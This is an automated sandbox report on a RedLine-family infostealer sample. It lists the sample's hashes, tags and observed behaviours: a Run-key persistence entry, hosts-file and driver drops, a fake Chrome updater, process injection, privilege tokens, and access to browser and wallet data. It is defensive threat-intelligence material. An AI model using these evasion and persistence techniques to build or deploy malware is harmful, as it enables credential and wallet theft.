Malware Analysis Report

2025-01-18 07:59

Sample ID 230812-nmangadd8z
Target 344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc
SHA256 344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc

Threat Level: Known bad

The file 344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Themida packer

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 11:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 11:30

Reported

2023-08-12 11:32

Platform

win10-20230703-en

Max time kernel

150s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2393848421-2120571652-2495149697-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3164 set thread context of 220 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4424 set thread context of 5016 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4424 set thread context of 2076 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2684 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2684 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2684 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2684 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2684 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2684 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2684 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2684 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4456 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
